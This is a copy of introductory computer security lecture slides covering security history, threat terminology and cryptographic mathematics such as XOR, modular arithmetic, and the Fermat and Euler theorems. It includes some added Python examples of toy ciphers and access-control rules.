introduction to computer security cs3235 - nus …cs3235/2003-semesteri/foils.pdf · introduction...

Introduction to Computer Security CS3235 Hugh Anderson CS3235 - Hugh Anderson’s notes.


Post on 09-Apr-2018


Page 1: Introduction to Computer Security CS3235 - NUS …cs3235/2003-semesterI/foils.pdf · Introduction to Computer Security CS3235 Hugh Anderson CS3235 - Hugh Anderson’s notes

Introduction to Computer Security CS3235

Hugh Anderson

CS3235 - Hugh Anderson’s notes.


Contact information

Room S15 #06-12

Telephone 6874-6903

E-mail [email protected]

...and Spinellis...


People

Dr Robert Deng, Institute for Infocomm Research

http://www.i2r.a-star.edu.sg/icsd/staff/Robert/


Official SOC description

With the widespread use of computers and Internet as well as electronic commerce, computer security becomes more and more important. The objective of this module is to give students basic knowledge of computer security. This module covers the following topics: threats to computer systems, network security fundamentals, security in a layered protocol architecture, authentication in computer systems, access control, intrusion detection, security architecture and frameworks, lower layers security protocols, upper layer security protocols, electronic mail and EDI security, directory systems security, Unix systems security, security evaluation criteria.


Assessment

Assessment Weighting Grade

Assignments 35%

Tutorials 5%

Mid-term Closed book 10%

Final Exam Open Book 50%

Total marks 100%


Resources

Computer Security: Art and Science, Matt Bishop

The notes are expanded versions of the overheads

Directed readings - all available on the Internet.

IVLE at http://ivle.nus.edu.sg/

Web site at http://www.comp.nus.edu.sg/~cs3235


Comparison

Different focus

More introductory and practical material

Less material duplicated


Topics - general

History and background,

Preliminaries

Encoding and decoding

Protocols used for security.


Topics - detail

• Mathematical, physical, legal (2 lectures)

• Security models (1 lecture)

• Secrecy (1 lecture)

• Insecurity (2 lectures)

• Safety/control hardware/software (2 lectures)

• Assurance (1 lecture)

• Protocols (1 lecture)

• + Case studies


Tutorials

Start in 3rd week

More details next week


My expectation...

Attend classes and tutorials

Ask if you don’t know

Read notes, book, and the readings...

Get interested in the subject


Chapter 1

Lecture 1 - Introduction


Jump-about-introduction

...sorry sorry...


The History of Herodotus

For Histiæus, when he was anxious to give Aristagoras orders to revolt, could find but one safe way, as the roads were guarded, of making his wishes known; which was by taking the trustiest of his slaves, shaving all the hair from off his head, and then pricking letters upon the skin, and waiting till the hair grew again. Thus accordingly he did; and as soon as ever the hair was grown, he despatched the man to Miletus, giving him no other message than this - "When thou art come to Miletus, bid Aristagoras shave thy head, and look thereon." Now the marks on the head, as I have already mentioned, were a command to revolt...


The History of Herodotus

Histiæus ensured confidentiality

Used again by Germany in the 1914-1918 war

This is now called steganography


More history

Cæsar encoded messages - cryptography

Agreed protocols to ensure correct conduct of a war

Examples taken from the world of warfare


Aspects to “computer security”

Security problems in society reoccur in computers

Confidentiality = locks/encoding.

Integrity = handshakes/signatures

Computer versions much faster.

In this course, security includes wider aspects.


Terms: Services

Three aspects of security services:

• confidentiality : concealing information - resources;

• integrity : trustworthiness of data - resources;

• availability : preventing denial-of-service.


Terms: Threats

[Four diagrams of Alice, Bob and Ted, captioned: Snooping; Man in the middle; Denial of service; Spoofing]


Terms: Threats

• disclosure : unauthorized access (snooping);

• deception : accept false data (man-in-the-middle);

• disruption : prevent correct operation (denial-of-service);

• usurpation : unauthorized control (spoofing).


Terms: Policy and mechanism

We differentiate between a security policy and a security mechanism:

• policy : what is allowed/disallowed;

• mechanism : ways of enforcing a policy


NUS IT policy

For example, at NUS, we have an IT policy which includes a range of clauses regarding security concerns, such as:

4.2 Undermining System Integrity

Users must not undermine the security of the IT Resources, for example, by cracking passwords or to modify or attempt to modify the files of other Users or software components of the IT Resources.


NUS mechanisms

6.3 Use Of Security Scanning Systems

Users consent to the University’s use of scanning programs for security purposes at system level for computers and systems that are connected to the University’s network. This is to ensure that any computers or systems attached to the network will not become a launching pad for security attack and jeopardise the IT Resources. System level scanning includes scanning for security vulnerabilities and virus detection on email attachments. Users’ files and data are excluded from the scanning.


Topic: Preliminaries

Review some mathematical concepts. XOR, modulo, primes

The textbook, and my notes should be enough.

Physical laws and procedures. Information and Entropy


Topic: Security models

These models provide formal ways of looking at computer security in an abstract manner.

1. Define a model, and

2. prove it secure

3. Ensure system complies with model


Topic: Security models

• The Bell-LaPadula model (no read-up, no write-down) provides a military viewpoint to assure confidentiality services.

• The Biba and Clark-Wilson models attempt to model the trustworthiness of data and programs, providing assurance for integrity services.

... Read ahead ...
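
The two Bell-LaPadula rules named above, written as access checks. This is an added example, not code from the lecture notes; the level names, the compartments and the sample subject and objects are all assumptions made up for illustration.

```python
from dataclasses import dataclass

# Assumed linear ordering of levels; the notes name the model but no levels.
LEVELS = ("unclassified", "confidential", "secret", "top secret")


@dataclass(frozen=True)
class Label:
    """A security label: a level plus a set of need-to-know compartments."""
    level: str
    compartments: frozenset = frozenset()

    def dominates(self, other):
        # A dominates B when A's level is at least B's and A holds every
        # compartment that B carries. Some labels are incomparable.
        return (LEVELS.index(self.level) >= LEVELS.index(other.level)
                and self.compartments >= other.compartments)


def may_read(subject, obj):
    """Simple security property (no read-up): subject must dominate object."""
    return subject.dominates(obj)


def may_write(subject, obj):
    """*-property (no write-down): object must dominate subject."""
    return obj.dominates(subject)


def may_copy(subject, source, sink):
    """A copy is a read of `source` followed by a write to `sink`."""
    return may_read(subject, source) and may_write(subject, sink)


# Constructed sample data (hypothetical subject and objects).
ANALYST = Label("secret", frozenset({"crypto"}))
OBJECTS = {
    "press_release": Label("unclassified"),
    "crypto_report": Label("secret", frozenset({"crypto"})),
    "war_plan": Label("top secret", frozenset({"crypto", "nuclear"})),
    "nuclear_memo": Label("confidential", frozenset({"nuclear"})),
}


def access_table(subject, objects):
    """Return {object name: (read allowed, write allowed)} for one subject."""
    return {name: (may_read(subject, label), may_write(subject, label))
            for name, label in objects.items()}


if __name__ == "__main__":
    for name, (r, w) in access_table(ANALYST, OBJECTS).items():
        print(f"{name:14} read={r!s:5} write={w}")
    # The write-down rule is what stops information flowing to a lower level:
    print("copy crypto_report -> press_release:",
          may_copy(ANALYST, OBJECTS["crypto_report"], OBJECTS["press_release"]))
```

The `nuclear_memo` row shows that a higher level alone is not enough: the labels are incomparable, so both read and write are refused.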


Topic: Security models

Determine properties of the model, and

Verify that implementations are valid.

Basis of trusted operating systems

Modelling for availability is tricky


Topic: Secrecy

Commerce relies on secure transfer of information, and

Often just want things to be secret

Distance between you and an attacker is shrinking

Criminals have an access point into your living room


2000 years ago...

Replace each Roman letter in a message, with another Roman letter, obtained by rotating the alphabet some number of characters:

Message:   I C L A V D I V S

Alphabet:  A B C D E F G H I K L M N O P Q R S T V X Y Z
Rotated:   V X Y Z A B C D E F G H I K L M N O P Q R S T

Encoded:   E Y G V Q Z E Q O

We can specify a Cæsar cipher by just noting the number of characters that the alphabet is rotated.
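
The slide's rotation worked through in code, as an added example that is not part of the original notes. It uses the slide's 23-letter alphabet and its A-to-V mapping; the function names are assumptions. Because the key is a single number, the last two functions show how little protection it gives: one known letter pair, or a search of all 23 rotations, recovers it.

```python
# Added example (not from the lecture notes): a Caesar cipher over the
# 23-letter Roman alphabet shown on the slide.
ROMAN = "ABCDEFGHIKLMNOPQRSTVXYZ"   # the slide's alphabet: no J, U or W
SLIDE_KEY = ROMAN.index("V")        # the slide maps A to V: a rotation of 19


def rotate(text, shift, alphabet=ROMAN):
    """Replace each letter with the one `shift` places along the alphabet.

    Characters outside the alphabet (spaces, punctuation) pass through.
    """
    n = len(alphabet)
    out = []
    for ch in text:
        pos = alphabet.find(ch)
        out.append(ch if pos < 0 else alphabet[(pos + shift) % n])
    return "".join(out)


def encrypt(plaintext, key):
    return rotate(plaintext, key)


def decrypt(ciphertext, key):
    return rotate(ciphertext, -key)


def key_from_pair(plain_letter, cipher_letter, alphabet=ROMAN):
    """One known plaintext/ciphertext letter pair reveals the whole key."""
    return (alphabet.index(cipher_letter)
            - alphabet.index(plain_letter)) % len(alphabet)


def exhaustive_search(ciphertext, known_word, alphabet=ROMAN):
    """Try every rotation; keep those whose output contains `known_word`."""
    hits = []
    for key in range(len(alphabet)):
        candidate = decrypt(ciphertext, key)
        if known_word in candidate:
            hits.append((key, candidate))
    return hits


if __name__ == "__main__":
    ciphertext = encrypt("ICLAVDIVS", SLIDE_KEY)
    print("key        :", SLIDE_KEY)
    print("ciphertext :", ciphertext)
    print("decrypted  :", decrypt(ciphertext, SLIDE_KEY))
    print("key from I->E:", key_from_pair("I", "E"))
    print("search     :", exhaustive_search(ciphertext, "CLAVDIVS"))
```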


60 years ago...


Enigma machines

Commercial device

Used by the German military

Belief that it could not be decoded.


Hacking Enigma

Americans captured a German submarine?

Alan Turing did it all?

Hard workers at Bletchley Park?

My dad?


Hacking Enigma

1928: Poles intercepted a machine

1928: Maths Dept at University of Poznan: Marian Rejewski, Jerzy Rozycki, Henryk Zygalski.

Decoded some messages

German army using an extra level of encoding

French spies uncovered the extra encoding


Hacking Enigma

1933-1939: the Polish Ciphers Office was able to decode messages, although slowly.

July 1939: Poland gave Enigma copies to English

Bletchley Park

May 1941: English captured the U-110 submarine, complete with a genuine Enigma machine, and code books.


Hacking Enigma

1941-45: English could decode most German military transmissions.

1941-45: developed a hardware system

Precursor to modern-day computers


Today...sssshhhh

Secure encrypted communications between

two untrusted hosts over an insecure network.

Other connections can also be forwarded

Users must prove their identity to the remote machine


Secure-shell

Based on public-key cryptography:

Encryption and decryption use separate keys

Not possible to derive one from the other

RSA is one such system.

Encodings believed to be difficult to decode, and

protocols of message exchange that are believed to be secure.


Topic: Insecurity

Systems dangerously easy to subvert

Adversary gains control over your system

You sign a contract, and other party doesn’t.

Investigate hacking and reducing risk


Topic: Insecurity

A locked air-conditioned room with file server:

• The lock can be picked, or the door kicked in.

• The console of the server computer may be password protected, but

– it may be rebooted with a different disk.


Topic: Insecurity

• The reboot process may be (BIOS) password protected, but

– the case of the computer may be opened and the disk removed.

• And so on...


Topic: Insecurity

Tempest - computer screen monitoring

Paper

http://jya.com/emr.pdf

Overcoming

http://www.cs.rice.edu/~dwallach/courses/comp527 s2000/ih98-tempest.pdf

Monitor screens at a distance of 1km for $15.


Topic: Insecurity

Kick in doors without even using your feet


Topic: Insecurity

Non-repudiation for e-commerce:

• the buyer cannot order an item and then deny the order took place;

• the seller cannot accept money or an order and then later deny that this took place.


Topic: Insecurity

Intrusive hacking is common on the Internet.

Farms of subservient machines:

At first, it looked as if some students at the Flint Hill School, a prep academy in Oakton, Va., had found a lucrative alternative to an after-school job...


Topic: Insecurity

Viruses: boot-sector viruses hide their code in the boot sector of a disk.

The Stoned virus for DOS, written by a student from New Zealand!

A virus contains code that replicates, attaching itself to a program, boot sector or document. Some viruses do damage as well.


Topic: Insecurity

A worm is a program that makes copies of itself, transferring itself around. The Morris worm in 1988:

On the evening of 2 November 1988, someone infected the Internet with a worm program. That program exploited flaws in utility programs in systems based on BSD-derived versions of UNIX. The flaws allowed the program to break into those machines and copy itself, thus infecting those systems.


The Morris Worm

This program eventually spread to thousands of machines, and disrupted normal activities and Internet connectivity for many days.

ftp://ftp.cs.purdue.edu/pub/reports/TR823.PS.Z

The author of the worm, Robert Morris, was convicted and fined $10,050 in 1990, and is currently a professor in the Parallel and Distributed Operating Systems group at MIT, lecturing in distributed systems areas.


Topic: Protocols

Some aspects of security are determined by the way in which we do things (the protocol), rather than what is actually done.


Summary of topics

In this section, we introduced the following topics:

• An introduction to computer security

• Some definitions


Further study

• Textbook Chapter 1

• Monitoring computer screens: http://jya.com/emr.pdf

• Overcoming Tempest monitoring: http://www.cs.rice.edu/~dwallach/courses/comp527 s2000/ih98-tempest.pdf

• The Morris worm: ftp://ftp.cs.purdue.edu/pub/reports/TR823.PS.Z

• Military mathematical modelling of security: http://80-ieeexplore.ieee.org.libproxy1.nus.edu.sg/xpl/tocresult.jsp?isNumber=13172


Done!


Chapter 2

Lecture 2 - Preliminaries


Note: CORS

You should be getting your tutorial sessions sorted out using CORS!

http://www.cors.nus.edu.sg/


Overheads and notes

You can find all sorts of stuff looking in

http://www.comp.nus.edu.sg/~cs3235/2003-semesterI/


Question box

If you have any questions, feel free to place them in the question box...

Or stick your hand up...

Or...


Last session

Introduction, setting context

Definitions

Cæsar cipher, Enigma, Secure shell

Insecurity


This session

• Finish context

• Math preliminaries

– XOR

– Logarithms

– Fields and groups


Diagram for BAG


Safety/control software

A naive approach to security might involve attempting to ensure that all programs that run on a computer are safe, and that all users of computer systems are trustworthy.

Checking even one program is a non-trivial task.

The computer operating system normally provides some level of software and hardware security for computer systems, combined with some level of user authorization.


Safety/control software

User authorization means passwords!

Systems have grown in complexity over the years.

An article shows the changes in the UNIX mechanism


Hardware security

Hardware security in operating systems has been studied in CS2106 (Operating Systems) and other courses. The Kernel/Supervisor bit, processor ring0, memory protection/mapping hardware and so on are all examples of hardware security systems intended to co-operate with the OS to enhance system security.

Software security in operating systems takes many forms. The forms range from ad-hoc changes to operating systems to fix security loopholes as they are found, through to operating systems built from the ground up to be secure.


Example: network security

TCP wrappers:

Attacks through poorly controlled TCP or UDP ports.

Wrapper provides single point of control

Default installation disables all access

Re-enable on a case-by-case basis.


OS security

NSA have a security-enhanced Linux system:

This version of Linux has a strong, flexible mandatory access control architecture incorporated into the major subsystems of the kernel. The system provides a mechanism to enforce the separation of information based on confidentiality and integrity requirements.

You can read about SELinux at

http://www.nsa.gov/selinux/index.html


OS security

Java virtual machine has built-in security model

Microsoft point out that the Linux security model is weak...

Every member of the Windows NT family since Windows NT 3.5 has been evaluated at either a C2 level under the U.S. Government’s evaluation process or at a C2-equivalent level under the British Government’s ITSEC process. In contrast, no Linux products are listed on the U.S. Government’s evaluated product list.


Topic: Assurance

How can we convince ourselves (or our employer) that the computer system is to be trusted?

Building assurance is best done by adopting formal methods to confirm, specify and verify the behaviour of systems.


ITSEC and CC

UK, Germany, France, Netherlands produced Information Technology Security Evaluation Criteria (ITSEC).

IT Security Evaluation Manual (ITSEM) specifies methodology for evaluation.

Common Criteria for Information Technology Security Evaluation is ITSEC, CTCPEC (Canadian Criteria) and US Federal Criteria

Accepted by the ISO (ISO15408).


ITSEC

In an article, elements of the first certification of a smart-card system under the European ITSEC level 6 certification are outlined.

This process involved verification of the specification with independent systems, and a formal process for the implementation, deriving it from the specification using the refinement process.


Math preliminaries

This chapter and the following chapter are copied verbatim from “The Laws of Cryptography with Java Code”, with permission from Prof Neal Wagner. The book is well worth reading and contains a lot of information that is relevant to this course. You can find the book at

http://www.cs.utsa.edu/~wagner/lawsbookcolor/laws.pdf

Exclusive-Or

Law XOR-1: The cryptographer’s favorite function is Exclusive-Or.

Exclusive-Or comes up constantly in cryptography.

Same as addition mod 2

Exclusive-Or

Also written as xor, or as a plus sign in a circle, ⊕.

The expression a ⊕ b means either a or b but not both.

Ordinary inclusive-or in mathematics means either one or the other or both.

The exclusive-or function is written in C / C++ / Java for bit strings as a hat character: ^.

Exclusive-Or for 1-bit

Exclusive-Or

a  b  a ⊕ b
0  0    0
0  1    1
1  0    1
1  1    0

Exclusive-Or

Message          A        B        C
m                01000001 01000010 01000011 . . .
Key = k          00010011 01100101 00111001 . . .
K(m) = m ⊕ k     01010010 00100111 01111010 . . .
K(m)             R        '        z

Exclusive-Or

K(m)             R        '        z
                 01010010 00100111 01111010 . . .
Key = k          00010011 01100101 00111001 . . .
m = K(m) ⊕ k     01000001 01000010 01000011 . . .
Message          A        B        C

If the bit-stream is random, and not known to an eavesdropper, then this is the most secure system. It is known as a one-time-pad.

Properties of XOR

a ⊕ a = 0
a ⊕ 0 = a
a ⊕ 1 = ∼a, where ∼ is bit complement.
a ⊕ b = b ⊕ a (commutativity)
a ⊕ (b ⊕ c) = (a ⊕ b) ⊕ c (associativity)
a ⊕ a ⊕ a = a
if a ⊕ b = c, then c ⊕ b = a and c ⊕ a = b.
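The encryption and decryption tables above, reproduced as an added Python example that is not part of the original notes. SLIDE_KEY is the key row from the slide; the function names and the second message in the demo are chosen here. The last function uses a ⊕ a = 0 to show why a pad must never be used for two messages.

```python
import secrets


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """XOR data with key byte by byte; the key must cover the whole message."""
    if len(key) < len(data):
        raise ValueError("one-time pad is shorter than the message")
    return bytes(d ^ k for d, k in zip(data, key))


def new_pad(length: int) -> bytes:
    """Pad drawn from the operating system's CSPRNG, one key byte per message byte."""
    return secrets.token_bytes(length)


# Values taken from the slide: m = "ABC", k = 00010011 01100101 00111001
SLIDE_MESSAGE = b"ABC"
SLIDE_KEY = bytes([0b00010011, 0b01100101, 0b00111001])


def slide_example():
    """Encrypt the slide's message, then decrypt it with the same key."""
    ciphertext = xor_bytes(SLIDE_MESSAGE, SLIDE_KEY)
    recovered = xor_bytes(ciphertext, SLIDE_KEY)  # (m xor k) xor k = m
    return ciphertext, recovered


def pad_reuse_leak(m1: bytes, m2: bytes, pad: bytes) -> bytes:
    """XOR of two ciphertexts made with the same pad.

    c1 xor c2 = (m1 xor k) xor (m2 xor k) = m1 xor m2, because k xor k = 0.
    The key has dropped out, so the result depends only on the two messages.
    """
    c1 = xor_bytes(m1, pad)
    c2 = xor_bytes(m2, pad)
    return xor_bytes(c1, c2)


if __name__ == "__main__":
    ciphertext, recovered = slide_example()
    print("ciphertext:", ciphertext, "recovered:", recovered)

    pad = new_pad(3)
    # Constructed second message, same length as the first.
    leaked = pad_reuse_leak(b"ABC", b"XYZ", pad)
    print("c1 xor c2 equals m1 xor m2:", leaked == xor_bytes(b"ABC", b"XYZ"))
```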

Reminder

Exchange the values in two variables a and b

temp = a;
a = b;
b = temp;

Exchange using XOR

a = a xor b;
b = a xor b;
a = a xor b;

a′ = a ⊕ b

b′ = (a ⊕ b) ⊕ b = a

a′′ = (a ⊕ b) ⊕ a = b

Logarithms

Law LOG-1: The cryptographer’s favorite logarithm is log base 2.

$y = \log_b x$ is the same as $b^y = x$

$b^{\log_b x} = x$

Logarithm is inverse of exponential.

Logarithms

Use logs base 2 in cryptography.

$y = \log_2 x$ is the same as $2^y = x$

$2^{10} = 1024$ is the same as $\log_2 1024 = 10$.

$2^y > 0$ for all y, and

$\log_2 x$ is not defined for $x \le 0$.

Properties of logs

$\log_2(ab) = \log_2 a + \log_2 b$, for all a, b > 0
$\log_2(a/b) = \log_2 a - \log_2 b$, for all a, b > 0
$\log_2(1/a) = \log_2(a^{-1}) = -\log_2 a$, for all a > 0
$\log_2(a^r) = r \log_2 a$, for all a > 0 and all r
$\log_2(a + b)$ = (Oops! No simple formula for this.)

Examples

Logarithms base 2

$x = 2^y = 2^{\log_2 x}$      $y = \log_2 x$
1,073,741,824                 30
1,048,576                     20
1,024                         10
8                             3
4                             2
2                             1
1                             0

Examples

Logarithms base 2

$x = 2^y = 2^{\log_2 x}$      $y = \log_2 x$
1                             0
1/2                           −1
1/4                           −2
1/8                           −3
1/1,024                       −10
0                             −∞
< 0                           undefined

Natural logs

A log base 2 is just a fixed constant times a natural log:

$\log_2 x = \log_e x / \log_e 2$ (mathematics)

= Math.log(x)/Math.log(2.0); (Java).

The magic constant is:

$\log_e 2$ = 0.69314 71805 59945 30941 72321, or $1/\log_e 2$ = 1.44269 50408 88963 40735 99246.

Proof of formula

$2^y = x$, or $y = \log_2 x$ (then take $\log_e$ of each side)

$\log_e(2^y) = \log_e x$ (then use properties of logarithms)

$y \log_e 2 = \log_e x$ (then solve for y)

$y = \log_e x / \log_e 2$ (then substitute $\log_2 x$ for y)

$\log_2 x = \log_e x / \log_e 2$.

Bits to represent

Law LOG-2: The log base 2 of an integer x tells how many bits it takes to represent x in binary.

Thus $\log_2 10000 = 13.28771238$, so it takes 14 bits to represent 10000 in binary. (In fact, $10000_{10} = 10011100010000_2$.) Exact powers of 2 are a special case: $\log_2 1024 = 10$, but it takes 11 bits to represent 1024 in binary, as $10000000000_2$.

Similarly, $\log_{10}(x)$ gives the number of decimal digits needed to represent x.

Groups

A group is a set of group elements with a binary operation.

If one denotes the group operation by #, then the above says that for any group elements a and b, a#b is defined and is also a group element.

Groups

Groups

• are associative, meaning that a#(b#c) = (a#b)#c

• have an identity element e satisfying a#e = e#a = a for any group element a

• have an inverse a′ for any element a, satisfying a#a′ = a′#a = e.

Groups

If a#b = b#a for all group elements a and b, the group is commutative.

Otherwise it is non-commutative. Notice that even in a non-commutative group, a#b = b#a might sometimes be true — for example if a or b is the identity.

A group with only finitely many elements is called finite; otherwise it is infinite.

Examples

• The integers (all whole numbers, including 0 and negative numbers) form a group using addition. The identity is 0 and the inverse of a is −a.

– This is an infinite commutative group.

• The positive rationals (all positive fractions, including all positive integers) form a group if ordinary multiplication is the operation. The identity is 1 and the inverse of r is $1/r = r^{-1}$.

– This is another infinite commutative group.

Examples

• The integers mod n form a group for any integer n > 0. This group is often denoted $Z_n$. Here the elements are 0, 1, 2, . . ., n − 1 and the operation is addition followed by remainder on division by n. The identity is 0 and the inverse of a is n − a (except for 0 which is its own inverse).

– This is a finite commutative group.

Non-commutative Group

Consider 2-by-2 non-singular matrices of real numbers (or rationals), where the operation is matrix multiplication: $\begin{pmatrix} a & b \\ c & d \end{pmatrix}$. Here a, b, c, and d are real numbers (or rationals) and ad − bc must be non-zero. Inverse is

$\frac{1}{ad - bc} \begin{pmatrix} d & -b \\ -c & a \end{pmatrix}$

and the identity is $\begin{pmatrix} 1 & 0 \\ 0 & 1 \end{pmatrix}$. This is an infinite non-commutative group.

Groups

Law GROUP-1: The cryptographer’s favorite group is the integers mod n, $Z_n$.

In the special case of n = 10, the operation of addition in $Z_{10}$ can be defined by (x + y) mod 10, that is, divide by 10 and take the remainder.

Integers modulo 10

+ | 0 1 2 3 4 5 6 7 8 9
--+--------------------
0 | 0 1 2 3 4 5 6 7 8 9
1 | 1 2 3 4 5 6 7 8 9 0
2 | 2 3 4 5 6 7 8 9 0 1
3 | 3 4 5 6 7 8 9 0 1 2
4 | 4 5 6 7 8 9 0 1 2 3
5 | 5 6 7 8 9 0 1 2 3 4
6 | 6 7 8 9 0 1 2 3 4 5
7 | 7 8 9 0 1 2 3 4 5 6
8 | 8 9 0 1 2 3 4 5 6 7
9 | 9 0 1 2 3 4 5 6 7 8

Fields

A field has two operations

+, with elements of the field forming a commutative group. Identity is 0 and inverse of a is −a.

∗, with elements of the field except 0 forming another commutative group, identity denoted by 1 and inverse of a denoted by $a^{-1}$.

Fields

There is also the distributive identity, linking + and ∗:

a ∗ (b + c) = (a ∗ b) + (a ∗ c)

Exclude divisors of zero, that is, non-zero elements whose product is zero.

Equivalent to the following cancellation property: if c is not zero and a ∗ c = b ∗ c, then a = b.

Examples

The rational numbers (fractions) Q, or the real numbers R, or the complex numbers C, using ordinary addition and multiplication (extended in the last case to the complex numbers).

These are all infinite fields.

Example: integers mod p

The integers mod p, denoted $Z_p$, where p is a prime number (2, 3, 5, 7, 11, 13, 17, 19, 23, 29, . . . ).

A group using +.

Elements without 0 form a group under ∗.

The identity is clearly 1, but the inverse of a non-zero element a is not obvious.

Integers mod p inverse

In Java, inverse must be x satisfying (x ∗ a)%p == 1.

Find x using the extended Euclidean algorithm:

Since p is prime and a is non-zero, the greatest common divisor of p and a is 1.

The extended Euclidean algorithm gives x and y satisfying x ∗ a + y ∗ p = 1, or x ∗ a = 1 − y ∗ p,

and x is the inverse of a.

Field

Law FIELD-1: The cryptographer’s favorite field is the integers mod p, denoted $Z_p$, where p is a prime number.

The above field is the only one with p elements. In other words, the field is unique up to renaming its elements, meaning that one can always use a different set of symbols to represent the elements of the field, but it will still be essentially the same.

Another Field

Law FIELD-2: The cryptographer’s other favorite field is GF($2^n$).

There is a finite field with $p^n$ elements for any integer n > 1, denoted GF($p^n$).

Useful in cryptography with p = 2, that is, with $2^n$ elements for n > 1.

The case $2^8 = 256$ is used, for example, in the new U.S. Advanced Encryption Standard (AES).

Fermat’s Theorem

Law FERMAT-1: The cryptographer’s favorite theorem is Fermat’s Theorem.

In cryptography, one often wants to raise a number to a power, modulo another number.

For the integers mod p where p is a prime (denoted $Z_p$), there is a result known as Fermat’s Theorem, discovered by the 17th century French mathematician Pierre de Fermat, 1601-1665.

Fermat’s theorem

Theorem (Fermat): If p is a prime and a is any non-zero number less than p, then

$a^{p-1} \bmod p = 1$

Fermat’s theorem

 p   a |  a^1  a^2  a^3  a^4  a^5  a^6  a^7  a^8  a^9 a^10 a^11 a^12
13   2 |    2    4    8    3    6   12   11    9    5   10    7    1
13   3 |    3    9    1    3    9    1    3    9    1    3    9    1
13   4 |    4    3   12    9   10    1    4    3   12    9   10    1
13   5 |    5   12    8    1    5   12    8    1    5   12    8    1
13   6 |    6   10    8    9    2   12    7    3    5    4   11    1
13   7 |    7   10    5    9   11   12    6    3    8    4    2    1
13   8 |    8   12    5    1    8   12    5    1    8   12    5    1
13   9 |    9    3    1    9    3    1    9    3    1    9    3    1
13  10 |   10    9   12    3    4    1   10    9   12    3    4    1
13  11 |   11    4    5    3    7   12    2    9    8   10    6    1
13  12 |   12    1   12    1   12    1   12    1   12    1   12    1

Fermat’s theorem

For p = 13 the value is always 1 by the time the power gets to 12.

Sometimes the value gets to 1 earlier.

Lengths of runs are always numbers that divide evenly into 12.

A value of a for which the whole row is needed is called a generator. 2, 6, 7, and 11 are generators.

Summary of topics

In this section, we introduced the “Cryptographer’s favorites”.

Further study

• The Laws of Cryptography with Java Code: http://www.cs.utsa.edu/~wagner/lawsbookcolor/laws.pdf

Chapter 3

Lecture 3 - Preliminaries

Overheads and notes

You can find all sorts of stuff looking in

http://www.comp.nus.edu.sg/~cs3235/2003-semesterI/

Question box

If you have any questions, feel free to place them in the question box...

Or stick your hand up...

Or...

Last session

• Finish context

• Math preliminaries

– XOR
– Logarithms
– Fields and groups

Recap - exclusive-or

Law XOR-1: The cryptographer’s favorite function is Exclusive-Or.

Message          A        B        C
m                01000001 01000010 01000011 . . .
Key = k          00010011 01100101 00111001 . . .
K(m) = m ⊕ k     01010010 00100111 01111010 . . .
K(m)             R        '        z

Exclusive-Or

K(m)             R        '        z
                 01010010 00100111 01111010 . . .
Key = k          00010011 01100101 00111001 . . .
m = K(m) ⊕ k     01000001 01000010 01000011 . . .
Message          A        B        C

If the bit-stream for the key k is random, and not known to an eavesdropper, then this is the most secure system. It is known as a one-time-pad.

Another diagram

[Diagram, labels only: P (Plaintext), X, Ki, Ki[P], X, Ki, P (Plaintext)]

(Compare with previous representations).

Logarithms

Law LOG-1: The cryptographer’s favorite logarithm is log base 2.

$y = \log_b x$ is the same as $b^y = x$

$b^{\log_b x} = x$

Logarithm is inverse of exponential.

Groups

A group is a set of group elements with a binary operation.

Law GROUP-1: The cryptographer’s favorite group is the integers mod n, $Z_n$.

Fields

A field has two operations

+, with elements forming a commutative group.

∗, with elements \ {0} forming another group.

Law FIELD-1: The cryptographer’s favorite field is the integers mod p, denoted $Z_p$, where p is a prime number.

Law FIELD-2: The cryptographer’s other favorite field is GF($2^n$).

This session

• Math preliminaries

– Fermat’s little theorem
– Euler

Fermat’s theorem

Theorem (Fermat): If p is a prime and a is any non-zero number less than p, then

$a^{p-1} \bmod p = 1$

Fermat’s theorem, p = 13

 p   a |  a^1  a^2  a^3  a^4  a^5  a^6  a^7  a^8  a^9 a^10 a^11 a^12
13   2 |    2    4    8    3    6   12   11    9    5   10    7    1
13   3 |    3    9    1    3    9    1    3    9    1    3    9    1
13   4 |    4    3   12    9   10    1    4    3   12    9   10    1
13   5 |    5   12    8    1    5   12    8    1    5   12    8    1
13   6 |    6   10    8    9    2   12    7    3    5    4   11    1
13   7 |    7   10    5    9   11   12    6    3    8    4    2    1
13   8 |    8   12    5    1    8   12    5    1    8   12    5    1
13   9 |    9    3    1    9    3    1    9    3    1    9    3    1
13  10 |   10    9   12    3    4    1   10    9   12    3    4    1
13  11 |   11    4    5    3    7   12    2    9    8   10    6    1
13  12 |   12    1   12    1   12    1   12    1   12    1   12    1

Fermat’s theorem, p = 13

Lengths of runs are always numbers that divide evenly into 12.

A value of a for which the whole row is needed is called a generator. 2, 6, 7, and 11 are generators.

An interesting observation..

Because a to a power mod p always starts repeating after the power reaches p − 1, you can do this:

$a^x \bmod p = a^{x \bmod (p-1)} \bmod p$.

Thus modulo p in the expression requires modulo p − 1 in the exponent. For p = 13 as above, then

$a^{29} \bmod 13 = a^{29 \bmod 12} \bmod 13 = a^5 \bmod 13$.

Another example

result = $7^{1215} \bmod 13$

Another example

result = (the decimal expansion of $7^{1215}$, written out in full on the slide) mod 13 = 5

How did I work that out?

I used bc

An arbitrary precision calculator language

Another example

result = $7^{1215} \bmod 13$

= $7^{1215 \bmod 12} \bmod 13$

= $7^3 \bmod 13$

= $343 \bmod 13$

= 5

Summary

We can do BIG NUMBER maths without calculating big numbers.

Euler

The Swiss mathematician Leonhard Euler (1707-1783) discovered a generalization of Fermat’s Theorem which will later be useful in the discussion of the RSA cryptosystem.

Euler’s theorem

Theorem (Euler): If n is any positive integer and a is any positive integer less than n with no divisors in common with n, then

$a^{\phi(n)} \bmod n = 1$,

where $\phi(n)$ is the Euler phi function:

$\phi(n) = n(1 - 1/p_1) \cdots (1 - 1/p_m)$,

and $p_1, \ldots, p_m$ are all the prime numbers that divide evenly into n, including n itself in case it is a prime.

Special case 1

If n is a prime, then using the formula,

$\phi(n) = n(1 - 1/n) = n\left(\frac{n-1}{n}\right) = n - 1$

Fermat’s result is a special case of Euler’s.

$a^{\phi(n)} \bmod n = a^{n-1} \bmod n = 1$

Special case 2

Another special case needed for RSA comes when the modulus is a product of two primes: n = pq. Then

$\phi(n) = n(1 - 1/p)(1 - 1/q) = (p - 1)(q - 1)$

Special case 2

$a^{(p-1)(q-1)} \bmod pq = 1$

• assuming a has no divisors in common with pq

• and p and q are primes

Euler: n = 15 and φ(n) = 8

  a^1  a^2  a^3  a^4  a^5  a^6  a^7  a^8  a^9 a^10 a^11 a^12 a^13 a^14
    2    4    8    1    2    4    8    1    2    4    8    1    2    4
    3    9   12    6    3    9   12    6    3    9   12    6    3    9
